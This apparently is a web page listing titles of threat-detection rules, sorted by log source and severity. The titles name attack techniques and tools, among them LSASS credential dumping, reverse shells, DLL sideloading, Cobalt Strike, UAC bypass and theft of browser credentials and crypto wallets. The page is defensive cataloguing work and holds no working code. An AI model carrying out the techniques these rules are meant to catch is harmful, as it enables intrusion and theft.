  • UNC4841 - SSL Certificate Exfiltration Via Openssl
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
  • UNC4841 - Potential SEASPY Execution
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
  • Terminate Linux Process Via Kill
  • Process Discovery
windows-image_load 120
Show Rules (120)
  • Alternate PowerShell Hosts - Image
  • Suspicious Load of Advapi31.dll
  • SCM DLL Sideload
  • Svchost DLL Search Order Hijack
  • Possible Process Hollowing Image Loading
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word
  • PowerShell Execution
  • DLL Loaded From Suspicious Location Via Cmspt.EXE
  • Amsi.DLL Loaded Via LOLBIN Process
  • Potential Azure Browser SSO Abuse
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32
  • CredUI.DLL Loaded By Uncommon Process
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded
  • PCRE.NET Package Image Load
  • Load Of RstrtMgr.DLL By A Suspicious Process
  • Load Of RstrtMgr.DLL By An Uncommon Process
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
  • Time Travel Debugging Utility Usage - Image
  • PowerShell Core DLL Loaded By Non PowerShell Process
  • Suspicious Volume Shadow Copy Vssapi.dll Load
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
  • Suspicious Volume Shadow Copy VSS_PS.dll Load
  • HackTool - SILENTTRINITY Stager DLL Load
  • HackTool - SharpEvtMute DLL Load
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
  • Unsigned Image Loaded Into LSASS Process
  • CLR DLL Loaded Via Office Applications
  • DotNET Assembly DLL Loaded Via Office Application
  • Active Directory Parsing DLL Loaded Via Office Application
  • GAC DLL Loaded Via Office Applications
  • Microsoft Excel Add-In Loaded From Uncommon Location
  • Active Directory Kerberos DLL Loaded Via Office Application
  • Microsoft VBA For Outlook Addin Loaded Via Outlook
  • VBA DLL Loaded Via Office Application
  • PowerShell Core DLL Loaded Via Office Application
  • Remote DLL Load Via Rundll32.EXE
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
  • Potential 7za.DLL Sideloading
  • Abusable DLL Potential Sideloading From Suspicious Location
  • Potential Antivirus Software DLL Sideloading
  • Potential appverifUI.DLL Sideloading
  • Aruba Network Service Potential DLL Sideloading
  • Potential AVKkid.DLL Sideloading
  • Potential CCleanerDU.DLL Sideloading
  • Potential CCleanerReactivator.DLL Sideloading
  • Potential Chrome Frame Helper DLL Sideloading
  • Potential DLL Sideloading Via ClassicExplorer32.dll
  • Potential DLL Sideloading Via comctl32.dll
  • Potential DLL Sideloading Using Coregen.exe
  • Potential DLL Sideloading Of DBGCORE.DLL
  • System Control Panel Item Loaded From Uncommon Location
  • Potential DLL Sideloading Of DBGHELP.DLL
  • Potential DLL Sideloading Of DbgModel.DLL
  • Potential EACore.DLL Sideloading
  • Potential Edputil.DLL Sideloading
  • Potential System DLL Sideloading From Non System Locations
  • Potential Goopdate.DLL Sideloading
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
  • Potential Iviewers.DLL Sideloading
  • Potential DLL Sideloading Via JsSchHlp
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
  • Potential Libvlc.DLL Sideloading
  • Potential Mfdetours.DLL Sideloading
  • Unsigned Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of MpSvc.DLL
  • Potential DLL Sideloading Of MsCorSvc.DLL
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders
  • Microsoft Office DLL Sideload
  • Potential Python DLL SideLoading
  • Potential Rcdll.DLL Sideloading
  • Potential RjvPlatform.DLL Sideloading From Default Location
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location
  • Potential RoboForm.DLL Sideloading
  • Potential ShellDispatch.DLL Sideloading
  • DLL Sideloading Of ShellChromeAPI.DLL
  • Potential SmadHook.DLL Sideloading
  • Potential SolidPDFCreator.DLL Sideloading
  • Third Party Software DLL Sideloading
  • Fax Service DLL Search Order Hijack
  • Potential Vivaldi_elf.DLL Sideloading
  • VMGuestLib DLL Sideload
  • VMMap Signed Dbghelp.DLL Potential Sideloading
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading
  • Potential DLL Sideloading Via VMware Xfer
  • Potential Waveedit.DLL Sideloading
  • Potential Wazuh Security Platform DLL Sideloading
  • Potential Mpclient.DLL Sideloading
  • Potential WWlib.DLL Sideloading
  • Windows Spooler Service Suspicious Binary Load
  • Unsigned Module Loaded by ClickOnce Application
  • DLL Load By System Process From Suspicious Locations
  • Python Image Load By Non-Python Process
  • DotNet CLR DLL Loaded By Scripting Applications
  • Unsigned DLL Loaded by Windows Utility
  • Suspicious Unsigned Thor Scanner Execution
  • UAC Bypass Using Iscsicpl - ImageLoad
  • UAC Bypass With Fake DLL
  • WMIC Loading Scripting Libraries
  • Wmiprvse Wbemcomn DLL Hijack
  • WMI Persistence - Command Line Event Consumer
  • Suspicious WSMAN Provider Image Loads
  • FoggyWeb Backdoor DLL Loading
  • Pingback Backdoor DLL Loading Activity
  • APT PRIVATELOG Image Load Pattern
  • Potential COLDSTEEL Persistence Service DLL Load
  • Malicious DLL Load By Compromised 3CXDesktopApp
  • DLL Names Used By SVR For GraphicalProton Backdoor
  • Diamond Sleet APT DLL Sideloading Indicators
  • Lazarus APT DLL Sideloading Activity
  • Potential CSharp Streamer RAT Loading .NET Executable Image
  • Kapeka Backdoor Loaded Via Rundll32.EXE
  • Potential Raspberry Robin Aclui Dll SideLoading
  • Amsi.DLL Load By Uncommon Process
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
  • System Drawing DLL Load
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
  • Microsoft Excel Add-In Loaded
  • Microsoft Word Add-In Loaded
  • WMI Module Loaded By Uncommon Process
  • Mimikatz In-Memory
macos-process_creation 67
Show Rules (67)
  • User Added To Admin Group - MacOS
  • MacOS Scripting Interpreter AppleScript
  • Decode Base64 Encoded Text -MacOs
  • Binary Padding - MacOS
  • File Time Attribute Change
  • Hidden Flag Set On File/Directory Via Chflags - MacOS
  • Indicator Removal on Host - Clear Mac System Logs
  • Clipboard Data Collection Via OSAScript
  • Creation Of A Local User Account
  • Hidden User Creation
  • Credentials from Password Stores - Keychain
  • System Integrity Protection (SIP) Disabled
  • System Integrity Protection (SIP) Enumeration
  • Disable Security Tools
  • User Added To Admin Group Via Dscl
  • User Added To Admin Group Via DseditGroup
  • Root Account Enable Via Dsenableroot
  • File and Directory Discovery - MacOS
  • Credentials In Files
  • GUI Input Capture - macOS
  • Disk Image Creation Via Hdiutil - MacOS
  • Disk Image Mounting Via Hdiutil - MacOS
  • Suspicious Installer Package Child Process
  • System Information Discovery Using Ioreg
  • JAMF MDM Potential Suspicious Child Process
  • JAMF MDM Execution
  • JXA In-memory Execution Via OSAScript
  • Launch Agent/Daemon Execution Via Launchctl
  • Local System Accounts Discovery - MacOs
  • Local Groups Discovery - MacOs
  • MacOS Network Service Scanning
  • Network Sniffing - MacOs
  • File Download Via Nscurl - MacOS
  • Suspicious Microsoft Office Child Process - MacOS
  • OSACompile Run-Only Execution
  • Payload Decoded and Decrypted via Built-in Utilities
  • Potential Persistence Via PlistBuddy
  • Remote Access Tool - Team Viewer Session Started On MacOS Host
  • Macos Remote System Discovery
  • Scheduled Cron Task/Job - MacOs
  • Screen Capture - macOS
  • Security Software Discovery - MacOs
  • Space After Filename - macOS
  • Split A File Into Pieces
  • Osacompile Execution By Potentially Suspicious Applet/Osascript
  • Suspicious Browser Child Process - MacOS
  • Suspicious Execution via macOS Script Editor
  • Potential Discovery Activity Using Find - MacOS
  • Suspicious History File Operations
  • Potential In-Memory Download And Compile Of Payloads
  • Suspicious MacOS Firmware Activity
  • System Network Discovery - macOS
  • System Information Discovery Using sw_vers
  • User Added To Admin Group Via Sysadminctl
  • Guest Account Enabled Via Sysadminctl
  • System Information Discovery Via Sysctl - MacOS
  • System Information Discovery Using System_Profiler
  • System Network Connections Discovery - MacOs
  • System Shutdown/Reboot - MacOs
  • Potential Base64 Decoded From Images
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS
  • Time Machine Backup Disabled Via Tmutil - MacOS
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS
  • Potential WizardUpdate Malware Infection
  • Gatekeeper Bypass via Xattr
  • Potential XCSSET Malware Infection
  • Clipboard Data Collection Via Pbpaste
windows-network_connection 65
Show Rules (65)
  • Microsoft Binary Github Communication
  • Suspicious Non-Browser Network Communication With Reddit API
  • Suspicious Epmap Connection
  • Network Connection Initiated By AddinUtil.EXE
  • Uncommon Connection to Active Directory Web Services
  • Uncommon Network Connection Initiated By Certutil.EXE
  • Outbound Network Connection Initiated By Cmstp.EXE
  • Outbound Network Connection Initiated By Microsoft Dialer
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
  • Network Connection Initiated To BTunnels Domains
  • Network Connection Initiated To Cloudflared Tunnels Domains
  • Network Communication With Crypto Mining Pool
  • New Connection Initiated To Potential Dead Drop Resolver Domain
  • Network Connection Initiated To DevTunnels Domain
  • Suspicious Dropbox API Usage
  • Suspicious Network Connection to IP Lookup Service APIs
  • Suspicious Non-Browser Network Communication With Google API
  • Communication To LocaltoNet Tunneling Service Initiated
  • Network Connection Initiated To Mega.nz
  • Process Initiated Network Connection To Ngrok Domain
  • Communication To Ngrok Tunneling Service Initiated
  • Potentially Suspicious Network Connection To Notion API
  • Network Communication Initiated To Portmap.IO Domain
  • Suspicious Non-Browser Network Communication With Telegram API
  • Network Connection Initiated To Visual Studio Code Tunnels Domain
  • Network Connection Initiated By Eqnedt32.EXE
  • Network Connection Initiated By IMEWDBLD.EXE
  • Network Connection Initiated Via Notepad.EXE
  • Office Application Initiated Network Connection To Non-Local IP
  • Office Application Initiated Network Connection Over Uncommon Ports
  • Python Initiated Connection
  • Outbound RDP Connections Over Non-Standard Tools
  • RDP Over Reverse SSH Tunnel
  • RDP to HTTP or HTTPS Target Ports
  • RegAsm.EXE Initiating Network Connection To Public IP
  • Remote Access Tool - AnyDesk Incoming Connection
  • Silenttrinity Stager Msbuild Activity
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
  • Network Connection Initiated By Regsvr32.EXE
  • Potentially Suspicious Malware Callback Communication
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
  • Microsoft Sync Center Suspicious Network Connections
  • Rundll32 Internet Connection
  • Uncommon Outbound Kerberos Connection
  • Potential Remote PowerShell Session Initiated
  • Communication To Uncommon Destination Ports
  • Outbound Network Connection To Public IP Via Winlogon
  • Suspicious Outbound SMTP Connections
  • Suspicious Network Connection Binary No CommandLine
  • Suspicious Wordpad Outbound Connections
  • Outbound Network Connection Initiated By Script Interpreter
  • Potentially Suspicious Wuauclt Network Connection
  • Local Network Connection Initiated By Script Interpreter
  • Potential Pikabot C2 Activity
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
  • New RDP Connection Initiated From Domain Controller
  • Dfsvc.EXE Network Connection To Non-Local IPs
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address
  • HH.EXE Initiated HTTP Network Connection
  • Msiexec.EXE Initiated Network Connection Over HTTP
  • Network Connection Initiated By PowerShell Process
  • Potentially Suspicious Azure Front Door Connection
  • Network Connection Initiated From Users\Public Folder
  • Suspicious Werfault.exe Network Connection Outbound
windows-registry_event 40
Show Rules (40)
  • Autorun Keys Modification
  • Creation of a Local Hidden User Account by Registry
  • Pandemic Registry Key
  • UAC Bypass Via Wsreset
  • CMSTP Execution Registry Event
  • Disable Security Events Logging Adding Reg Key MiniNt
  • Esentutl Volume Shadow Copy Service Keys
  • Wdigest CredGuard Registry Modification
  • Windows Credential Editor Registry
  • HybridConnectionManager Service Installation - Registry
  • Registry Entries For Azorult Malware
  • Potential Qakbot Registry Activity
  • PrinterNightmare Mimikatz Driver Name
  • Path To Screensaver Binary Modified
  • Narrator's Feedback-Hub Persistence
  • New DLL Added to AppCertDlls Registry Key
  • NetNTLM Downgrade Attack - Registry
  • New DLL Added to AppInit_DLLs Registry Key
  • Office Application Startup - Office Test
  • Windows Registry Trust Record Modification
  • Registry Persistence Mechanisms in Recycle Bin
  • New PortProxy Registry Entry Added
  • RedMimicry Winnti Playbook Registry Manipulation
  • WINEKEY Registry Modification
  • Run Once Task Configuration in Registry
  • Shell Open Registry Keys Manipulation
  • Security Support Provider (SSP) Added to LSA Configuration
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique
  • Sticky Key Like Backdoor Usage - Registry
  • Atbroker Registry Change
  • Suspicious Run Key from Download
  • DLL Load via LSASS
  • Suspicious Camera and Microphone Access
  • OceanLotus Registry Activity
  • OilRig APT Registry Persistence
  • FlowCloud Registry Markers
  • Leviathan Registry Key Activity
  • SNAKE Malware Covert Store Registry Key
  • Diamond Sleet APT Scheduled Task Creation - Registry
  • Scheduled Task Created - Registry
windows-ps_module 35
Show Rules (35)
  • Netcat The Powershell Version - PowerShell Module
  • Potential Active Directory Enumeration Using AD Module - PsModule
  • Alternate PowerShell Hosts - PowerShell Module
  • Bad Opsec Powershell Code Artifacts
  • Clear PowerShell History - PowerShell Module
  • PowerShell Decompress Commands
  • Malicious PowerShell Scripts - PoshModule
  • Suspicious Get-ADDBAccount Usage
  • PowerShell Get Clipboard
  • HackTool - Evil-WinRm Execution - PowerShell Module
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module
  • Invoke-Obfuscation Via Stdin - PowerShell Module
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module
  • Invoke-Obfuscation Via Use Clip - PowerShell Module
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module
  • Malicious PowerShell Commandlets - PoshModule
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule
  • Remote PowerShell Session (PS Module)
  • Suspicious PowerShell Download - PoshModule
  • Use Get-NetTCPConnection - PowerShell Module
  • Suspicious PowerShell Invocations - Generic - PowerShell Module
  • Suspicious PowerShell Invocations - Specific - PowerShell Module
  • Suspicious Get Local Groups Information
  • Suspicious Computer Machine Password by PowerShell
  • Suspicious Get Information for SMB Share - PowerShell Module
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet
windows-driver_load 32
Show Rules (32)
  • Credential Dumping Tools Service Execution
  • Usage Of Malicious POORTRY Signed Driver
  • PowerShell Scripts Run by a Services
  • Vulnerable AVAST Anti Rootkit Driver Load
  • Vulnerable Dell BIOS Update Driver Load
  • Vulnerable Driver Load By Name
  • Vulnerable GIGABYTE Driver Load
  • Vulnerable HW Driver Load
  • Vulnerable Lenovo Driver Load
  • Malicious Driver Load
  • PUA - System Informer Driver Load
  • Malicious Driver Load By Name
  • Driver Load From A Temporary Directory
  • PUA - Process Hacker Driver Load
  • Vulnerable Driver Load By Name
  • Vulnerable HackSys Extreme Vulnerable Driver Load
  • Vulnerable WinRing0 Driver Load
  • WinDivert Driver Load
  • Vulnerable Driver Load
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation Via Use Rundll32
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • Meterpreter or Cobalt Strike Getsystem Service Installation
  • Tap Driver Installation
windows-process_access 32
Show Rules (32)
  • Suspicious In-Memory Module Execution
  • Credential Dumping by LaZagne
  • Credential Dumping Tools Accessing LSASS Memory
  • Credential Dumping by Pypykatz
  • Potential NT API Stub Patching
  • Mimikatz Detection LSASS Access
  • CMSTP Execution Process Access
  • HackTool - CobaltStrike BOF Injection Pattern
  • HackTool - Generic Process Access
  • HackTool - LittleCorporal Generated Maldoc Injection
  • HackTool - HandleKatz Duplicating LSASS Handle
  • Lsass Memory Dump via Comsvcs DLL
  • HackTool - SysmonEnte Execution
  • LSASS Memory Access by Tool With Dump Keyword In Name
  • Potential Credential Dumping Activity Via LSASS
  • Credential Dumping Activity By Python Based Tool
  • Remote LSASS Process Access Through Windows Remote Management
  • Suspicious LSASS Access Via MalSecLogon
  • Potentially Suspicious GrantedAccess Flags On LSASS
  • Credential Dumping Attempt Via WerFault
  • LSASS Access From Potentially White-Listed Processes
  • Uncommon Process Access Rights For Target Image
  • Potential Direct Syscall of NtOpenProcess
  • Credential Dumping Attempt Via Svchost
  • Suspicious Svchost Process Access
  • Function Call From Undocumented COM Interface EditionUpgradeManager
  • UAC Bypass Using WOW64 Logger DLL Hijack
  • Malware Shellcode in Verclsid Target Process
  • Potential Credential Dumping Attempt Via PowerShell
  • LSASS Access From Program In Potentially Suspicious Folder
  • Uncommon GrantedAccess Flags On LSASS
  • Potential Shellcode Injection
windows-dns_query 24
Show Rules (24)
  • DNS Query for Anonfiles.com Domain - Sysmon
  • AppX Package Installation Attempts Via AppInstaller.EXE
  • Cloudflared Tunnels Related DNS Requests
  • DNS Query To Devtunnels Domain
  • DNS Query To AzureWebsites.NET By Non-Browser Process
  • DNS Server Discovery Via LDAP Query
  • DNS HybridConnectionManager Service Bus
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon
  • DNS Query To MEGA Hosting Website
  • DNS Query Request By QuickAssist.EXE
  • DNS Query Request To OneLaunch Update Service
  • DNS Query Request By Regsvr32.EXE
  • DNS Query To Remote Access Software Domain From Non-Browser App
  • Suspicious DNS Query for IP Lookup Service APIs
  • TeamViewer Domain Query By Non-TeamViewer Application
  • DNS Query Tor .Onion Address - Sysmon
  • DNS Query To Ufile.io
  • DNS Query To Visual Studio Code Tunnels Domain
  • Potential SocGholish Second Stage C2 DNS Query
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS
  • Diamond Sleet APT DNS Communication Indicators
  • DPRK Threat Actor - C2 Communication DNS Indicators
  • DNS Request From Windows Script Host
  • Possible DNS Rebinding
windows-pipe_created 20
Show Rules (20)
  • PsExec Pipes Artifacts
  • CobaltStrike Named Pipe
  • ADFS Database Named Pipe Connection By Uncommon Tool
  • CobaltStrike Named Pipe Pattern Regex
  • CobaltStrike Named Pipe Patterns
  • HackTool - CoercedPotato Named Pipe Creation
  • HackTool - EfsPotato Named Pipe Creation
  • HackTool - DiagTrackEoP Default Named Pipe
  • HackTool - Koh Default Named Pipe
  • HackTool - Credential Dumping Tools Named Pipe Created
  • Alternate PowerShell Hosts Pipe
  • New PowerShell Instance Created
  • PUA - CSExec Default Named Pipe
  • PUA - PAExec Default Named Pipe
  • PUA - RemCom Default Named Pipe
  • WMI Event Consumer Created Named Pipe
  • Malicious Named Pipe Created
  • PsExec Tool Execution From Suspicious Locations - PipeName
  • Turla Group Named Pipes
  • PsExec Default Named Pipe
opencanary-application 18
Show Rules (18)
  • OpenCanary - FTP Login Attempt
  • OpenCanary - GIT Clone Request
  • OpenCanary - HTTPPROXY Login Attempt
  • OpenCanary - HTTP GET Request
  • OpenCanary - HTTP POST Login Attempt
  • OpenCanary - MSSQL Login Attempt Via SQLAuth
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication
  • OpenCanary - MySQL Login Attempt
  • OpenCanary - NTP Monlist Request
  • OpenCanary - REDIS Action Command Attempt
  • OpenCanary - SIP Request
  • OpenCanary - SMB File Open Request
  • OpenCanary - SNMP OID Request
  • OpenCanary - SSH Login Attempt
  • OpenCanary - SSH New Connection Attempt
  • OpenCanary - Telnet Login Attempt
  • OpenCanary - TFTP Request
  • OpenCanary - VNC Connection Attempt
rpc_firewall-application 17
Show Rules (17)
  • Remote Schedule Task Lateral Movement via ATSvc
  • Remote Schedule Task Recon via AtScv
  • Possible DCSync Attack
  • Remote Event Log Recon
  • Remote Encrypting File System Abuse
  • Remote Schedule Task Lateral Movement via ITaskSchedulerService
  • Remote Schedule Task Recon via ITaskSchedulerService
  • Remote Printing Abuse for Lateral Movement
  • Remote DCOM/WMI Lateral Movement
  • Remote Registry Lateral Movement
  • Remote Registry Recon
  • Remote Server Service Abuse
  • Remote Server Service Abuse for Lateral Movement
  • Remote Schedule Task Lateral Movement via SASec
  • Recon Activity via SASec
  • SharpHound Recon Account Discovery
  • SharpHound Recon Sessions
windows-create_remote_thread 16
Show Rules (16)
  • Suspicious Remote Thread Target
  • HackTool - CACTUSTORCH Remote Thread Creation
  • HackTool - Potential CobaltStrike Process Injection
  • Remote Thread Created In KeePass.EXE
  • Remote Thread Creation In Mstsc.Exe From Suspicious Location
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread
  • Password Dumper Remote Thread in LSASS
  • Remote Thread Creation Via PowerShell In Uncommon Target
  • Rare Remote Thread Creation By Uncommon Source Image
  • Remote Thread Created In Shell Application
  • Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation In Uncommon Target Image
  • Remote Thread Creation Ttdinject.exe Proxy
  • Potential Bumblebee Remote Thread Creation
  • CreateRemoteThread API and LoadLibrary
  • Remote Thread Creation Via PowerShell
windows-file_delete 14
Show Rules (14)
  • Potential PrintNightmare Exploitation Attempt
  • Backup Files Deleted
  • EventLog EVTX File Deleted
  • Exchange PowerShell Cmdlet History Deleted
  • Process Deletion of Its Own Executable
  • IIS WebServer Access Logs Deleted
  • PowerShell Console History Logs Deleted
  • Prefetch File Deleted
  • TeamViewer Log File Deleted
  • Tomcat WebServer Logs Deleted
  • File Deleted Via Sysinternals SDelete
  • Unusual File Deletion by Dns.exe
  • ADS Zone.Identifier Deleted By Uncommon Application
  • ADS Zone.Identifier Deleted
windows-file_access 12
Show Rules (12)
  • Credential Manager Access By Uncommon Applications
  • Access To Crypto Currency Wallets By Uncommon Applications
  • Access To Windows Credential History File By Uncommon Applications
  • Access To Windows DPAPI Master Keys By Uncommon Applications
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications
  • Microsoft Teams Sensitive File Access By Uncommon Applications
  • Access To Browser Credential Files By Uncommon Applications
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications
  • Access To Windows Outlook Mail Files By Uncommon Applications
  • Access To Sysvol Policies Share By Uncommon Process
  • Access To .Reg/.Hive Files By Uncommon Applications
  • Unattend.XML File Access Attempt
windows-ps_classic_start 11
Show Rules (11)
  • Nslookup PowerShell Download Cradle
  • Delete Volume Shadow Copies Via WMI With PowerShell
  • PowerShell Downgrade Attack - PowerShell
  • PowerShell Called from an Executable Version Mismatch
  • Netcat The Powershell Version
  • Remote PowerShell Session (PS Classic)
  • Renamed Powershell Under Powershell Channel
  • Suspicious PowerShell Download
  • Use Get-NetTCPConnection
  • Uncommon PowerShell Hosts
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
windows-registry_add 10
Show Rules (10)
  • Sysinternals SDelete Registry Keys
  • Potential NetWire RAT Activity - Registry
  • Potential Persistence Via New AMSI Providers - Registry
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry
  • Potential Persistence Via Disk Cleanup Handler - Registry
  • Potential Persistence Via Logon Scripts - Registry
  • PUA - Sysinternal Tool Execution - Registry
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry
  • PUA - Sysinternals Tools Execution - Registry
  • Potential Ursnif Malware Activity - Registry
kubernetes-application 10
Show Rules (10)
  • Deployment Deleted From Kubernetes Cluster
  • Kubernetes Events Deleted
  • Potential Remote Command Execution In Pod Container
  • Container With A hostPath Mount Created
  • Privileged Container Deployed
  • Creation Of Pod In System Namespace
  • RBAC Permission Enumeration Attempt
  • Kubernetes Secrets Enumeration
  • New Kubernetes Service Account Created
  • Potential Sidecar Injection Into Running Deployment
linux-file_event 10
Show Rules (10)
  • Persistence Via Sudoers Files
  • Potentially Suspicious Shell Script Creation in Profile Folder
  • Triple Cross eBPF Rootkit Default LockFile
  • Persistence Via Cron Files
  • Wget Creating Files in Tmp Directory
  • Triple Cross eBPF Rootkit Default Persistence
  • Linux Doas Conf File Creation
  • UNC4841 - Email Exfiltration File Pattern
  • UNC4841 - Barracuda ESG Exploitation Indicators
  • Python Path Configuration File Creation - Linux
windows-create_stream_hash 9
Show Rules (9)
  • Creation Of a Suspicious ADS File Outside a Browser Download
  • Hidden Executable In NTFS Alternate Data Stream
  • Suspicious File Download From File Sharing Websites - File Stream
  • Unusual File Download From File Sharing Websites - File Stream
  • HackTool Named File Stream Created
  • Exports Registry Key To an Alternate Data Stream
  • Unusual File Download from Direct IP Address
  • Potential Suspicious Winget Package Installation
  • Potentially Suspicious File Download From ZIP TLD
windows-registry_delete 7
Show Rules (7)
  • Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry
  • Terminal Server Client Connection History Cleared - Registry
  • Removal Of AMSI Provider Registry Keys
  • Removal of Potential COM Hijacking Registry Keys
  • Removal Of Index Value to Hide Schedule Task - Registry
  • Removal Of SD Value to Hide Schedule Task - Registry
jvm-application 5
Show Rules (5)
  • Potential JNDI Injection Exploitation In JVM Based Application
  • Potential Local File Read Vulnerability In JVM Based Application
  • Potential OGNL Injection Exploitation In JVM Based Application
  • Process Execution Error In JVM Based Application
  • Potential XXE Exploitation Attempt In JVM Based Application
linux-network_connection 5
Show Rules (5)
  • Linux Reverse Shell Indicator
  • Communication To Ngrok Tunneling Service - Linux
  • Communication To LocaltoNet Tunneling Service Initiated - Linux
  • Linux Crypto Mining Pool Connections
  • Potentially Suspicious Malware Callback Communication - Linux
macos-file_event 3
Show Rules (3)
  • MacOS Emond Launch Daemon
  • Startup Item File Created - MacOS
  • Python Path Configuration File Creation - MacOS
windows-wmi_event 3
Show Rules (3)
  • WMI Event Subscription
  • Suspicious Scripting in a WMI Consumer
  • Suspicious Encoded Scripts in a WMI Consumer
spring-application 2
Show Rules (2)
  • Spring Framework Exceptions
  • Potential SpEL Injection In Spring Framework
windows-file_change 2
Show Rules (2)
  • File Creation Date Changed to Another Year
  • Unusual File Modification by dns.exe
windows-file_rename 2
Show Rules (2)
  • Suspicious Appended Extension
  • Non-DLL Extension File Renamed With DLL Extension
django-application 1
Show Rules (1)
  • Django Framework Exceptions
nodejs-application 1
Show Rules (1)
  • Potential RCE Exploitation Attempt In NodeJS
python-application 1
Show Rules (1)
  • Python SQL Exceptions
ruby_on_rails-application 1
Show Rules (1)
  • Ruby on Rails Framework Exceptions
sql-application 1
Show Rules (1)
  • Suspicious SQL Error Messages
velocity-application 1
Show Rules (1)
  • Potential Server Side Template Injection In Velocity
windows-file_executable_detected 1
Show Rules (1)
  • Potentially Suspicious Self Extraction Directive File Created
windows-ps_classic_provider_start 1
Show Rules (1)
  • Tamper Windows Defender - PSClassic
windows-process_tampering 1
Show Rules (1)
  • Potential Process Hollowing Activity
windows-raw_access_thread 1
Show Rules (1)
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools
windows-sysmon_error 1
Show Rules (1)
  • Sysmon Configuration Error
windows-sysmon_status 1
Show Rules (1)
  • Sysmon Configuration Modification
paloalto-file_event 1
Show Rules (1)
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
paloalto-appliance 1
Show Rules (1)
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection

Top Levels

LevelCountRule TitleCount Bar
high 1675
Show Rules (1675)
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd
  • Domestic Kitten FurBall Malware Pattern
  • CobaltStrike Malleable Amazon Browsing Traffic Profile
  • CobaltStrike Malleable (OCSP) Profile
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile
  • Search-ms and WebDAV Suspicious Indicators in URL
  • Usage Of Malicious POORTRY Signed Driver
  • PowerShell Scripts Run by a Services
  • Vulnerable AVAST Anti Rootkit Driver Load
  • Vulnerable Dell BIOS Update Driver Load
  • Vulnerable GIGABYTE Driver Load
  • Vulnerable HW Driver Load
  • Vulnerable Lenovo Driver Load
  • Suspicious File Event With Teams Objects
  • CrackMapExec File Creation Patterns
  • LSASS Memory Dump File Creation
  • CreateMiniDump Hacktool
  • Suspicious CLR Logs Creation
  • Svchost DLL Search Order Hijack
  • Possible Process Hollowing Image Loading
  • Microsoft Binary Github Communication
  • Suspicious Epmap Connection
  • AzureHound PowerShell Commands
  • Execution via CL_Invocation.ps1 - Powershell
  • Execution via CL_Mutexverifiers.ps1
  • PrintNightmare Powershell Exploitation
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Credential Dumping Tools Accessing LSASS Memory
  • APT29
  • GALLIUM Artefacts
  • Suspicious Certutil Command Usage
  • Hurricane Panda Activity
  • Lazarus Activity Apr21
  • Credential Acquisition via Registry Hive Dumping
  • Execution via MSSQL Xp_cmdshell Stored Procedure
  • Invoke-Obfuscation Via Use Rundll32
  • New Lolbin Process by Office Applications
  • Suspicious File Download Using Office Application
